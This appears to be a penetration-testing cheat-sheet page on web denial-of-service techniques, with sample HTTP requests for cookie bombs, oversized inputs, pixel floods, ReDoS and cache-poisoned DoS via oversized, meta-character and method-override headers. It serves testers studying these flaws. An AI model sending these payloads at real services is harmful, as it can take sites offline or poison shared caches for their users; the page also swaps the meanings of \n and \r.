Intrusionz3r0
HacktheboxTwitter
  • Welcome
  • Windows Penetration Testing
    • Enumeration
    • Credentials Attacks On Windows
    • Kerberos
    • Abuse ACLS
    • Common Attacks
    • Abuse Tokens
    • Kerberos “Double Hop”
    • Privileged Groups
    • Defense Evasion
    • Active Directory Certificate Services
    • Windows Persistence
    • Privilege Escalation
    • Trust Enumeration and Attacks
    • Windows Lateral Movement
    • Powershell Cheetsheet
    • Microsoft Exchange and Office
  • Linux Penetration Testing
    • Linux Active directory
    • Tools
    • Privilege Groups
    • Post Exploitation
    • Privilege Escalation
      • Sudo Privilege escalation
      • Writable .service files
      • Wildcard on compression binaries
      • Path Abuse
      • Capabilities
      • Exploit Logrotate
      • Weak NFS Privileges
      • Hijacking Tmux Sessions
      • Shared Libraries
      • Shared Object Hijacking
      • Python Library Hijacking
      • Linux Enumeration
    • Stealing Linux Credentials
    • Critical Vulnerabilities
    • Upgrading TTY
    • Process monitoring
    • Miscellaneous
    • Escape Restricted Shell
  • Malware Development
    • Malware Development Essentials
    • Code Snippets
    • Malware Development Intermediate
  • Social Engineering
  • Portforwarding and tunneling
  • File Transfer Techniques
  • Password Attacks
  • Enumeration
    • Network Enumeration
    • (OSINT) Active Enumeration
    • (OSINT) Passive Enumeration
    • [22] SSH
    • [21] FTP
    • [25,465,587] SMTP
    • [53] DNS Enumeration
    • [80 443] HTTP HTTPS
    • [110,143,993,995] IMAP/POP3 Enumeration
    • [111,2049] Network File System
    • [139,445] SMB Enumeration
    • [161] SNMP
    • [512,513,514] R-Services
    • [623] IPMI
    • [873] Rsync
    • [1433] MSSQL
    • [1521] Oracle TNS
    • [3389] Remote Desktop Protocol (RDP)
    • [5985/5986] WinRM
    • [3306] Mysql
    • [513] Rlogin
  • Hacking Web
    • Methodology
    • Vulnerabilities
      • SQL Injection
      • Cross Site Scripting (XSS)
      • File path traversal/Local File Inclusion
      • File Upload Attacks
      • Denial of Service
      • Command Injection
      • Insecure Direct Object Reference (IDOR)
      • XML External Entity (XXE) Injection
      • Web Mass Assignment Vulnerabilities
      • Log4Shell Exploitation Guide
      • Authentication
      • Business Vulnerabilities
      • Access control vulnerabilities
      • Server-Side Request Forgery (SSRF)
      • Cross-site request forgery (CSRF)
      • Cross-origin resource sharing (CORS)
      • Clickjacking
      • DOM-based vulnerabilities
      • JWT vulnerabilities
      • Password reset poisoning
    • Web Tech Detection viaa Tokens, Headers & Cookies
    • Burpsuite through SOCKS5
    • Bypass 403 - Forbidden
  • OSINT
  • Common Applications
    • Gitlab
    • Splunk
    • Tomcat
    • Joomla
    • Microsoft Internet Information Services (IIS)
    • Nagios XI
    • Wordpress
    • Drupal
    • Tomcat CGI
    • osTicket
    • Attacking Thick Client Applications
    • PRTG Network Monitor
    • Jenkins
    • ColdFusion
    • WebLogic
    • Grafana
    • Umbraco
  • Containers Pentesting
  • C2 Command and Control
    • Sliver
    • Cobalt Strike
    • Mythic
    • Havoc
  • Report Templates
  • Anonymity Guide
  • Labs
    • Vulnlabs
      • Baby
      • Trusted (Chain)
      • Retro
      • Retro2
      • Hybrid (Chain)
      • Baby2
      • Breach
      • Sendai
      • Sweep
      • Delegate
      • Redelegate
      • Media
      • Bruno
      • Cicada
      • Lustrous2
      • Tengu (Chain)
      • Reflection (Chain)
      • Tea (Chain)
      • Heron (Chain)
      • Lustrous (Chain)
      • Kaiju (Chain)
      • Intercept (Chain)
      • Sidecar (Chain)
      • Vigilant (Chain)
      • Job
      • Job2
      • Puppet (Chain)
      • Mythical (Chain)
      • Push (Chain)
Powered by GitBook
On this page
  • Cookie bomb
  • Long payload at form
  • Pixel flood
  • Image parameters
  • Changing the value of the header
  • ReDoS (Regex DoS)
  • HTTP Header Oversize (HHO)
  • HTTP Meta Character (HMC)
  • HTTP Method Override (HMO)
  • References
  1. Hacking Web
  2. Vulnerabilities

Denial of Service

PreviousFile Upload AttacksNextCommand Injection

Last updated 5 months ago

Cookie bomb

<https://target.com/index.php?param1=xxxxxxxxxxxxxx>

After input "xxxxxxxxxxxxxx" as a value of param1, check your cookies. If there is cookies the value is "xxxxxxxxxxxxxxxxxxxxxx" it means the website is vulnerable

Long payload at form

Try input a very long payload to form. For example using very long password or using very long email

POST /register HTTP/1.1
Host: target.com
...

username=victim&password=aaaaaaaaaaaaaaa

Pixel flood

Using image with a huge pixels

Download the payload:

  1. Frame flood, using GIF with a huge frame

Download the payload:

Image parameters

Sometimes in website we found a parameter that can adjust the size of the image, for example

<https://target.com/img/vulnerable.jpg?width=500&height=500>

Try change "500" to "99999999999"

<https://target.com/img/vulnerable.jpg?width=99999999999&height=99999999999>

Changing the value of the header

Accept-Encoding: gzip, gzip, deflate, br, br

ReDoS (Regex DoS)

A Regular Expression Denial of Service (ReDoS) happens when someone takes advantage of weaknesses in how regular expressions (a way to search and match patterns in text) work. Sometimes, when regular expressions are used, they can become very slow, especially if the piece of text they're working with gets larger. This slowness can get so bad that it grows really fast with even small increases in the text size. Attackers can use this problem to make a program that uses regular expressions stop working properly for a long time.

CPDoS

HTTP Header Oversize (HHO)

A malicious client sends an HTTP GET request including a header larger than the size supported by the origin server but smaller than the size supported by the cache

GET /index.html HTTP/1.1
Host: victim.com
X-Oversized-Header-1: Big_Value
...

The response is

HTTP/1.1 400 Bad Request
...

Header size exceeded

HTTP Meta Character (HMC)

this attack tries to bypass a cache with a request header containing a harmful meta character. Meta characters can be, e.g., control characters such as line break/carriage return (\n), line feed (\r) or bell (\a).

GET /index.html HTTP /1.1
Host: victim.com
X-Meta-Malicious-Header: \\\\r\\\\n
...

The response is

HTTP/1.1 400 Bad Request
...

Character not allowed

HTTP Method Override (HMO)

There are several headers present in HTTP Standard that allow modifying overriding the original HTTP header. Some of these headers are:

1. X-HTTP-Method-Override
2. X-HTTP-Method
3. X-Method-Override

The header instructs the application to override the HTTP method in request.

GET /index.php HTTP/1.1
Host: victim.com
X-HTTP-Method-Override: POST
...

The response is

HTTP/1.1 404 Not Found
...

POST on /index.php not found

X-Forwarded-Port

GET /index.php?dontpoisoneveryone=1 HTTP/1.1
Host: www.hackerone.com
X-Forwarded-Port: 123
...

X-Forwarded-Host

GET /index.php?dontpoisoneveryone=1 HTTP/1.1
Host: www.hackerone.com
X-Forwarded-Host: www.hackerone.com:123
...

References

!

Here
Here
https://github.com/HackTricks-wiki/hacktricks/blob/master/pentesting-web/regular-expression-denial-of-service-redos.md
https://cpdos.org/
https://portswigger.net/cms/images/6f/83/45a1a9f841b9-article-screen_shot_2018-09-13_at_11.08.12.png
Hackerone #840598
Hackerone #105363
Hackerone #390
Hackerone #400
Hackerone #751904
Hackerone #861170
Hackerone #892615
Hackerone #511381
Hackerone #409370
CPDoS